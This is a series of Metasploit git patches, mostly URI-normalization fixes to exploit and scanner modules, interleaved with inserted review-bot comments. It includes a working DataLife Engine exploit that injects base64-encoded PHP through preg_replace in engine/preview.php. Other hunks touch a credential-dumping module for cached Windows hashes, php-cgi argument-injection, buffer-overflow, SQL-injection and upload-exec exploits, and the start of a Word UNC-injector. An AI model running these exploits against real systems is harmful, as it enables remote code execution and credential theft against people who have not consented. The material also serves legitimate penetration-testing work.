+ [ + OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]) + ], self.class) + end + + def base + base = normalize_uri(target_uri.path) + return base + end + + def check + fingerprint = rand_text_alpha(4+rand(4)) + res = send_request_cgi( + { + 'uri' => "#{base}/engine/preview.php", + 'method' => 'POST', + 'vars_post' => + { + 'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//" + } + }) + + if res and res.code == 200 and res.body =~ /#{fingerprint}/ + return 
Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + end + + def exploit + @peer = "#{rhost}:#{rport}" + + print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code") + res = send_request_cgi( + { + 'uri' => "#{base}/engine/preview.php", + 'method' => 'POST', + 'vars_post' => + { + 'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//" + } + }) + end +end From b2ce9302c6258438880c0d5a71455bd0c2d2e34f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Thu, 31 Jan 2013 16:59:49 +0100 Subject: [PATCH 210/421] uri normalization in the old way --- modules/exploits/unix/webapp/datalife_preview_exec.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/unix/webapp/datalife_preview_exec.rb b/modules/exploits/unix/webapp/datalife_preview_exec.rb index 2d3a1398ff4d..6a120a8a3141 100644 --- a/modules/exploits/unix/webapp/datalife_preview_exec.rb +++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb @@ -55,6 +55,7 @@ def initialize(info = {}) def base base = normalize_uri(target_uri.path) + base << '/' if base[-1, 1] != '/' return base end @@ -62,7 +63,7 @@ def check fingerprint = rand_text_alpha(4+rand(4)) res = send_request_cgi( { - 'uri' => "#{base}/engine/preview.php", + 'uri' => "#{base}engine/preview.php", 'method' => 'POST', 'vars_post' => { @@ -83,7 +84,7 @@ def exploit print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code") res = send_request_cgi( { - 'uri' => "#{base}/engine/preview.php", + 'uri' => "#{base}engine/preview.php", 'method' => 'POST', 'vars_post' => { From 4d7daacfb42ff2f38c0fbcea64307dae74510d03 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 31 Jan 2013 11:55:11 -0600 Subject: [PATCH 211/421] I wanna know where it's stored --- modules/post/windows/gather/cachedump.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) 
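Review bot: In datalife_preview_exec.rb `check`, the `else` branch returns `Exploit::CheckCode::Safe` when `res` is nil, so a timeout or an unreachable host is reported the same way as a target that answered without the fingerprint. Anyone using `check` to assess exposure would get a false "safe" result from a network failure. Add `return Exploit::CheckCode::Unknown unless res` before the `if`, and keep `Safe` for responses that were actually received.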
diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb index a6299a173be4..579522017420 100644 --- a/modules/post/windows/gather/cachedump.rb +++ b/modules/post/windows/gather/cachedump.rb @@ -524,11 +524,13 @@ def run if( @vista == 1 ) print_status("Hash are in MSCACHE_VISTA format. (mscash2)") - store_loot("mscache2.creds", "text/csv", session, @credentials.to_csv, "mscache2_credentials.txt", "MSCACHE v2 Credentials") + p = store_loot("mscache2.creds", "text/csv", session, @credentials.to_csv, "mscache2_credentials.txt", "MSCACHE v2 Credentials") + print_status("MSCACHE v2 saved in: #{p}") else print_status("Hash are in MSCACHE format. (mscash)") - store_loot("mscache.creds", "text/csv", session, @credentials.to_csv, "mscache_credentials.txt", "MSCACHE v1 Credentials") + p = store_loot("mscache.creds", "text/csv", session, @credentials.to_csv, "mscache_credentials.txt", "MSCACHE v1 Credentials") + print_status("MSCACHE v1 saved in: #{p}") end rescue ::Interrupt From 5332e80ae940f9f59371ebe42829c71a2fe48640 Mon Sep 17 00:00:00 2001 From: egypt <egypt@metasploit.com> Date: Thu, 31 Jan 2013 14:18:42 -0600 Subject: [PATCH 212/421] Fix errant use of .to_s instead of .path --- .../scanner/http/apache_activemq_source_disclosure.rb | 2 +- .../scanner/http/atlassian_crowd_fileaccess.rb | 4 ++-- modules/auxiliary/scanner/http/dolibarr_login.rb | 2 +- modules/auxiliary/scanner/http/glassfish_login.rb | 2 +- modules/auxiliary/scanner/http/vcms_login.rb | 2 +- modules/exploits/multi/http/php_cgi_arg_injection.rb | 4 +--- .../windows/http/php_apache_request_headers_bof.rb | 2 +- .../windows/http/sonicwall_scrutinizer_sqli.rb | 2 +- modules/exploits/windows/http/sysax_create_folder.rb | 10 +++++----- .../exploits/windows/mysql/scrutinizer_upload_exec.rb | 2 +- 10 files changed, 15 insertions(+), 17 deletions(-) 
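Review bot: In cachedump.rb `run`, the new local `p` shadows `Kernel#p` for the rest of the method and says nothing about what it holds. A name such as `loot_path` reads better: `loot_path = store_loot(...)` followed by `print_status("MSCACHE v2 saved in: #{loot_path}")`. The two branches now differ only in the loot type, file name and label, so they could share one `store_loot`/`print_status` pair driven by those three values. `run` starts and ends outside this hunk.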
diff --git a/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb b/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb index 6f1ada9d1002..18d2d942abe9 100644 --- a/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb @@ -47,7 +47,7 @@ def initialize(info = {}) def run_host(ip) print_status("#{rhost}:#{rport} - Sending request...") - uri = normalize_uri(target_uri.to_s) + uri = normalize_uri(target_uri.path) res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', diff --git a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb index e94787a50ac1..d3e7d5f4ecfd 100644 --- a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb +++ b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb @@ -57,7 +57,7 @@ def rport end def run_host(ip) - uri = normalize_uri(target_uri.to_s) + uri = normalize_uri(target_uri.path) res = send_request_cgi({ 'uri' => uri, 'method' => 'GET'}) @@ -71,7 +71,7 @@ def run_host(ip) end def accessfile(rhost) - uri = normalize_uri(target_uri.to_s) + uri = normalize_uri(target_uri.path) print_status("#{rhost}:#{rport} Connecting to Crowd SOAP Interface") soapenv = 'http://schemas.xmlsoap.org/soap/envelope/' diff --git a/modules/auxiliary/scanner/http/dolibarr_login.rb b/modules/auxiliary/scanner/http/dolibarr_login.rb index 97a97ae75d52..dfbaca5d16fe 100644 --- a/modules/auxiliary/scanner/http/dolibarr_login.rb +++ b/modules/auxiliary/scanner/http/dolibarr_login.rb @@ -112,7 +112,7 @@ def do_login(user, pass) end def run - @uri = normalize_uri(target_uri) + @uri = normalize_uri(target_uri.path) @uri.path << "/" if @uri.path[-1, 1] != "/" @peer = "#{rhost}:#{rport}" diff --git a/modules/auxiliary/scanner/http/glassfish_login.rb b/modules/auxiliary/scanner/http/glassfish_login.rb index a48c352431b6..a58f98fb73fd 100644 
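Review bot: In dolibarr_login.rb `run`, the unchanged line after the edit, `@uri.path << "/" if @uri.path[-1, 1] != "/"`, calls `.path` on the value assigned from `normalize_uri(target_uri.path)`. Elsewhere in this series the result of `normalize_uri` is used as a String (concatenated with `+` and `<<`), so `@uri.path` would appear to raise NoMethodError. If `@uri` is meant to be the normalized path string, the follow-up line should be `@uri << "/" if @uri[-1, 1] != "/"`. If later code needs a URI object, keep `target_uri` in `@uri` and normalize only where the request path is built. vcms_login.rb `run` has the identical pair of lines; the rest of both methods is outside the hunks.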
--- a/modules/auxiliary/scanner/http/glassfish_login.rb +++ b/modules/auxiliary/scanner/http/glassfish_login.rb @@ -218,7 +218,7 @@ def run_host(ip) #Get GlassFish version edition, version, banner = get_version(res) - path = normalize_uri(target_uri) + path = normalize_uri(target_uri.path) target_url = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}" print_status("#{target_url} - GlassFish - Attempting authentication") diff --git a/modules/auxiliary/scanner/http/vcms_login.rb b/modules/auxiliary/scanner/http/vcms_login.rb index 7afdc7e61d1d..a4fe31dba260 100644 --- a/modules/auxiliary/scanner/http/vcms_login.rb +++ b/modules/auxiliary/scanner/http/vcms_login.rb @@ -108,7 +108,7 @@ def do_login(user, pass) end def run - @uri = normalize_uri(target_uri) + @uri = normalize_uri(target_uri.path) @uri.path << "/" if @uri.path[-1, 1] != "/" @peer = "#{rhost}:#{rport}" diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index 2f45fc760244..a245a3cd457f 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -96,11 +96,9 @@ def exploit ] qs = args.join() - uri = normalize_uri(target_uri) + uri = normalize_uri(target_uri.path) uri = "#{uri}?#{qs}" - #print_status("URI: #{target_uri}?#{qs}") # Uncomment to preview URI - # Has to be all on one line, so gsub out the comments and the newlines payload_oneline = "<?php " + payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "") response = send_request_cgi( { diff --git a/modules/exploits/windows/http/php_apache_request_headers_bof.rb b/modules/exploits/windows/http/php_apache_request_headers_bof.rb index 253866b1c89d..be89cbc5a488 100644 --- a/modules/exploits/windows/http/php_apache_request_headers_bof.rb +++ b/modules/exploits/windows/http/php_apache_request_headers_bof.rb 
@@ -103,7 +103,7 @@ def exploit print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") res = send_request_cgi({ - 'uri' => normalize_uri(target_uri.to_s), + 'uri' => normalize_uri(target_uri.path), 'method' => 'GET', 'headers' => { diff --git a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb index c73b3b2499c1..e38a0979c8a6 100644 --- a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb +++ b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb @@ -62,7 +62,7 @@ def initialize(info={}) def check - res = send_request_raw({'uri'=>normalize_uri(target_uri.host)}) + res = send_request_raw({'uri'=>normalize_uri(target_uri.path)}) if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-1]\<\/div\>/ return Exploit::CheckCode::Vulnerable diff --git a/modules/exploits/windows/http/sysax_create_folder.rb b/modules/exploits/windows/http/sysax_create_folder.rb index 9d43164587b5..1e678f874d81 100644 --- a/modules/exploits/windows/http/sysax_create_folder.rb +++ b/modules/exploits/windows/http/sysax_create_folder.rb @@ -126,12 +126,12 @@ def get_sid pass = datastore['SysaxPASS'] creds = "fd=#{Rex::Text.encode_base64(user+"\x0a"+pass)}" - uri = target_uri.to_s + uri = target_uri.path # Login to get SID value r = send_request_cgi({ 'method' => "POST", - 'uri' => normalize_uri("#{uri}/scgi?sid=0&pid=dologin"), - 'data' => creds + 'uri' => normalize_uri("#{uri}/scgi?sid=0&pid=dologin"), + 'data' => creds }) # Parse response for SID token 
@@ -146,7 +146,7 @@ def get_root_path(sid) # Find the path because it's used to help calculate the offset random_folder_name = rand_text_alpha(8) # This folder should not exist in the root dir - uri normalize_uri(target_uri.to_s) + uri = normalize_uri(target_uri.path) r = send_request_cgi({ 'uri' => normalize_uri("#{uri}/scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm"), 'method' => 'POST', @@ -182,7 +182,7 @@ def exploit post_data = Rex::MIME::Message.new post_data.add_part(buffer, nil, nil, "form-data; name=\"e2\"") post_data.bound = rand_text_numeric(57) # example; "---------------------------12816808881949705206242427669" - uri = normalize_uri(target_uri.to_s) + uri = normalize_uri(target_uri.path) r = send_request_cgi({ 'uri' => normalize_uri("#{uri}/scgi?sid=#{sid}&pid=mk_folder2_name1.htm"), 'method' => 'POST', diff --git a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb index 641783f5a31d..e1f1e509439f 100644 --- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb +++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb @@ -72,7 +72,7 @@ def initialize(info={}) def check tmp_rport = datastore['RPORT'] - uri = normalize_uri(target_uri.host) + uri = normalize_uri(target_uri.path) uri << '/' if uri[-1,1] != '/' datastore['RPORT'] = datastore['HTTPPORT'] res = send_request_raw({'uri'=>uri}) From 1a01d6d033acd8522d6eb216c4ae8c7ed5f1f8fa Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 31 Jan 2013 14:48:54 -0600 Subject: [PATCH 213/421] Fix scrutinizer checks --- modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb | 2 +- modules/exploits/windows/mysql/scrutinizer_upload_exec.rb | 4 +--- 2 files changed, 2 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb index e38a0979c8a6..34857f9f84e1 100644 
--- a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb +++ b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb @@ -62,7 +62,7 @@ def initialize(info={}) def check - res = send_request_raw({'uri'=>normalize_uri(target_uri.path)}) + res = send_request_raw({'uri'=>'/'}) # Check the base path for version regex if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-1]\<\/div\>/ return Exploit::CheckCode::Vulnerable diff --git a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb index e1f1e509439f..135132c9b65e 100644 --- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb +++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb @@ -72,10 +72,8 @@ def initialize(info={}) def check tmp_rport = datastore['RPORT'] - uri = normalize_uri(target_uri.path) - uri << '/' if uri[-1,1] != '/' datastore['RPORT'] = datastore['HTTPPORT'] - res = send_request_raw({'uri'=>uri}) + res = send_request_raw({'uri'=>'/'}) #Check the base path for regex datastore['RPORT'] = tmp_rport if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-2]\<\/div\>/ From 39cdb89831e1c4005a0951a44cde75a17612c1e2 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 31 Jan 2013 15:04:13 -0600 Subject: [PATCH 214/421] Oh don't be so sensitive about it. Fixnum vs String --- modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb index b677c8776319..e03844bf80eb 100644 --- a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb +++ b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb 
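Review bot: In scrutinizer_upload_exec.rb `check`, `datastore['RPORT']` is swapped to `HTTPPORT` and restored only on the line after `send_request_raw`. If the request raises, the restore is skipped and the module keeps the wrong port for every later step. Wrap the request in `begin ... ensure` so that `datastore['RPORT'] = tmp_rport` always runs. Now that the path is the literal `'/'`, a short comment noting that TARGETURI is deliberately ignored here would also help the next reader.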
@@ -62,7 +62,7 @@ def cache_user_info(user_id) "uri" => user_url, "method" => "GET", "vars_get" => { - "author" => user_id + "author" => user_id.to_s } }) From 9d4bc6bb895f716cf57e348f16bb37323ce81713 Mon Sep 17 00:00:00 2001 From: egypt <egypt@metasploit.com> Date: Thu, 31 Jan 2013 15:29:30 -0600 Subject: [PATCH 215/421] Restructure a bit and add checks for doubled '//' --- spec/lib/msf/core/exploit/http/client_spec.rb | 133 ++++++++++-------- 1 file changed, 78 insertions(+), 55 deletions(-) diff --git a/spec/lib/msf/core/exploit/http/client_spec.rb b/spec/lib/msf/core/exploit/http/client_spec.rb index d32ce9e12216..93180d3a5a72 100644 --- a/spec/lib/msf/core/exploit/http/client_spec.rb +++ b/spec/lib/msf/core/exploit/http/client_spec.rb @@ -11,7 +11,7 @@ mod end - context 'normalize_uri' do + describe '#normalize_uri' do let(:expected_normalized_uri) do '/a/b/c' end @@ -20,6 +20,20 @@ subject.normalize_uri(unnormalized_uri) end + context "with just '/'" do + let(:unnormalized_uri) do + '/' + end + + it "should be '/'" do + unnormalized_uri.should == '/' + end + + it "should return '/'" do + normalized_uri.should == '/' + end + end + context "with starting '/'" do let(:unnormalized_uri) do expected_normalized_uri @@ -30,7 +44,17 @@ end it "should not add another starting '/'" do - normalized_uri.should == expected_normalized_uri + normalized_uri.should == expected_normalized_uri + end + + context "with multiple internal '/'" do + let(:unnormalized_uri) do + "/#{expected_normalized_uri.gsub("/", "////")}" + end + + it "should remove doubled internal '/'" do + normalized_uri.should == expected_normalized_uri + end end context "with multiple starting '/'" do 
@@ -48,39 +72,25 @@ end context "with trailing '/'" do - let(:unnormalized_uri) do - "#{expected_normalized_uri}/" + let(:expected_normalized_uri) do + '/a/b/c/' end - it "should end with '/'" do - unnormalized_uri[-1, 1].should == '/' + let(:unnormalized_uri) do + "#{expected_normalized_uri}/" end it "should end with '/'" do normalized_uri[-1, 1].should == '/' end - context "with just '/'" do - let(:unnormalized_uri) do - '/' - end - - it "should be '/'" do - unnormalized_uri.should == '/' - end - - it "should return '/'" do - normalized_uri.should == '/' - end - end - - context "with multiple multiple trailing '/'" do + context "with multiple trailing '/'" do let(:unnormalized_uri) do - "#{expected_normalized_uri}" + "#{expected_normalized_uri}/" end - it "should have single trailing '/'" do - unnormalized_uri[-2,1].should == '/' + it "should have multiple trailing '/'" do + unnormalized_uri[-2,2].should == '//' end it "should return only one trailing '/'" do @@ -105,16 +115,15 @@ end context "without starting '/'" do - let(:unnormalized_uri) do - 'a/b/c' - end - context "with trailing '/'" do let(:unnormalized_uri) do 'a/b/c/' end + let(:expected_normalized_uri) do + '/a/b/c/' + end - it "'should have trailing '/'" do + it "should have trailing '/'" do unnormalized_uri[-1, 1].should == '/' end 
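Review bot: The outer `with trailing '/'` context now builds `unnormalized_uri` as `"#{expected_normalized_uri}/"` with `expected_normalized_uri` set to `'/a/b/c/'`, which is the same doubled-slash input the nested `with multiple trailing '/'` context uses, so the plain single-trailing-slash case is no longer exercised. Setting the outer input to `expected_normalized_uri` itself and keeping the extra `/` only in the nested context would cover both cases. The outer context also lost its sanity assertion on the input, `unnormalized_uri[-1, 1].should == '/'`, which the neighbouring contexts still have.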
@@ -122,17 +131,31 @@ normalized_uri[0, 1].should == '/' end - it "'should not remove trailing '/'" do + it "should not remove trailing '/'" do normalized_uri[-1, 1].should == '/' end it 'should normalize the uri' do - normalized_uri.should == "#{expected_normalized_uri}/" + normalized_uri.should == "#{expected_normalized_uri}" + end + + context "with multiple internal '/'" do + let(:unnormalized_uri) do + "/#{expected_normalized_uri.gsub("/", "////")}" + end + + it "should remove doubled internal '/'" do + normalized_uri.should == expected_normalized_uri + end end end context "without trailing '/'" do - it "'should not have trailing '/'" do + let(:unnormalized_uri) do + 'a/b/c' + end + + it "should not have trailing '/'" do unnormalized_uri[-1, 1].should_not == '/' end @@ -143,35 +166,35 @@ it "should add trailing '/'" do normalized_uri[-1, 1].should_not == '/' end + end + end - context 'with empty string' do - let(:unnormalized_uri) do - '' - end + context 'with empty string' do + let(:unnormalized_uri) do + '' + end - it "should be empty" do - unnormalized_uri.should be_empty - end + it "should be empty" do + unnormalized_uri.should be_empty + end - it "should return '/'" do - normalized_uri.should == '/' - end - end + it "should return '/'" do + normalized_uri.should == '/' + end + end - context 'with nil' do - let(:unnormalized_uri) do - nil - end + context 'with nil' do + let(:unnormalized_uri) do + nil + end - it 'should be nil' do - unnormalized_uri.should be_nil - end + it 'should be nil' do + unnormalized_uri.should be_nil + end - it "should return '/" do - normalized_uri.should == '/' - end - end + it "should return '/" do + normalized_uri.should == '/' end end end -end \ No newline at end of file +end From de8572d934fe21eebb5b9cdd3ae00386307f77a0 Mon Sep 17 00:00:00 2001 
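Review bot: The added `with multiple internal '/'` context sits under `without starting '/'`, but its input `"/#{expected_normalized_uri.gsub("/", "////")}"` begins with `/`, so it repeats the starting-slash case instead of testing a URI without one. Deriving the input from the unprefixed form, for example `'a/b/c/'.gsub('/', '////')`, would match the enclosing context. In the following hunk (-143) the unchanged example `it "should add trailing '/'"` asserts `should_not == '/'`, so its description should read `should not add trailing '/'`, and the moved `it "should return '/"` is missing its closing quote.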
From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 31 Jan 2013 16:57:48 -0600 Subject: [PATCH 216/421] Use normalize_uri for URI --- modules/exploits/unix/webapp/datalife_preview_exec.rb | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/modules/exploits/unix/webapp/datalife_preview_exec.rb b/modules/exploits/unix/webapp/datalife_preview_exec.rb index 6a120a8a3141..e1339f1313cb 100644 --- a/modules/exploits/unix/webapp/datalife_preview_exec.rb +++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb @@ -53,17 +53,15 @@ def initialize(info = {}) ], self.class) end - def base - base = normalize_uri(target_uri.path) - base << '/' if base[-1, 1] != '/' - return base + def uri + normalize_uri(target_uri.path, 'engine', 'preview.php') end def check fingerprint = rand_text_alpha(4+rand(4)) res = send_request_cgi( { - 'uri' => "#{base}engine/preview.php", + 'uri' => uri, 'method' => 'POST', 'vars_post' => { @@ -84,7 +82,7 @@ def exploit print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code") res = send_request_cgi( { - 'uri' => "#{base}engine/preview.php", + 'uri' => uri, 'method' => 'POST', 'vars_post' => { From e71c2c5ece97c8a237186eeaab46526be28b2cb3 Mon Sep 17 00:00:00 2001 
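Review bot: The new helper in datalife_preview_exec.rb is named `uri`, the same name other modules in this series use for a local variable (`uri = normalize_uri(target_uri.path)`); a later local assignment `uri = ...` inside `check` or `exploit` would silently shadow the method. A more specific name such as `preview_uri`, with a one-line comment `# Path to engine/preview.php below the configured base path`, would make the two call sites in `check` and `exploit` self-explanatory. Both callers continue outside their hunks.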
From: SphaZ <cyberphaz@gmail.com> Date: Fri, 1 Feb 2013 08:03:41 +0100 Subject: [PATCH 217/421] added word_unc_injector auxiliary module --- .../docx/sourcedoc/[Content_Types].xml | 2 + modules/auxiliary/docx/sourcedoc/_rels/.rels | 2 + .../auxiliary/docx/sourcedoc/docProps/app.xml | 2 + .../sourcedoc/word/_rels/document.xml.rels | 2 + .../docx/sourcedoc/word/document.xml | 2 + .../docx/sourcedoc/word/fontTable.xml | 2 + .../docx/sourcedoc/word/settings.xml | 2 + .../auxiliary/docx/sourcedoc/word/styles.xml | 2 + .../docx/sourcedoc/word/theme/theme1.xml | 2 + .../docx/sourcedoc/word/webSettings.xml | 2 + modules/auxiliary/docx/word_unc_injector.rb | 320 ++++++++++++++++++ 11 files changed, 340 insertions(+) create mode 100644 modules/auxiliary/docx/sourcedoc/[Content_Types].xml create mode 100644 modules/auxiliary/docx/sourcedoc/_rels/.rels create mode 100644 modules/auxiliary/docx/sourcedoc/docProps/app.xml create mode 100644 modules/auxiliary/docx/sourcedoc/word/_rels/document.xml.rels create mode 100644 modules/auxiliary/docx/sourcedoc/word/document.xml create mode 100644 modules/auxiliary/docx/sourcedoc/word/fontTable.xml create mode 100644 modules/auxiliary/docx/sourcedoc/word/settings.xml create mode 100644 modules/auxiliary/docx/sourcedoc/word/styles.xml create mode 100644 modules/auxiliary/docx/sourcedoc/word/theme/theme1.xml create mode 100644 modules/auxiliary/docx/sourcedoc/word/webSettings.xml create mode 100644 modules/auxiliary/docx/word_unc_injector.rb diff --git a/modules/auxiliary/docx/sourcedoc/[Content_Types].xml b/modules/auxiliary/docx/sourcedoc/[Content_Types].xml new file mode 100644 index 000000000000..39a9cb897f0e --- /dev/null +++ b/modules/auxiliary/docx/sourcedoc/[Content_Types].xml 
@@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/></Types> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/_rels/.rels b/modules/auxiliary/docx/sourcedoc/_rels/.rels new file mode 100644 index 000000000000..fdd8c4f37126 --- /dev/null +++ b/modules/auxiliary/docx/sourcedoc/_rels/.rels 
@@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/docProps/app.xml b/modules/auxiliary/docx/sourcedoc/docProps/app.xml new file mode 100644 index 000000000000..1f971257721b --- /dev/null +++ b/modules/auxiliary/docx/sourcedoc/docProps/app.xml @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>hoi.dot</Template><TotalTime>0</TotalTime><Pages>1</Pages><Words>0</Words><Characters>3</Characters><Application>Microsoft Office Outlook</Application><DocSecurity>0</DocSecurity><Lines>0</Lines><Paragraphs>0</Paragraphs><ScaleCrop>false</ScaleCrop><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>0</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>12.0000</AppVersion></Properties> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/_rels/document.xml.rels b/modules/auxiliary/docx/sourcedoc/word/_rels/document.xml.rels new file mode 100644 index 000000000000..0079d06931a7 --- /dev/null +++ b/modules/auxiliary/docx/sourcedoc/word/_rels/document.xml.rels 
@@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/></Relationships> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/document.xml b/modules/auxiliary/docx/sourcedoc/word/document.xml new file mode 100644 index 000000000000..6e291134c2fa --- /dev/null +++ b/modules/auxiliary/docx/sourcedoc/word/document.xml 
@@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml"><w:body><w:p w:rsidR="00E97639" w:rsidRDefault="00E97639"><w:r><w:t>hoi</w:t></w:r></w:p><w:sectPr w:rsidR="00E97639" w:rsidSect="00B25E88"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/fontTable.xml b/modules/auxiliary/docx/sourcedoc/word/fontTable.xml new file mode 100644 index 000000000000..20e9a398fef8 --- /dev/null +++ 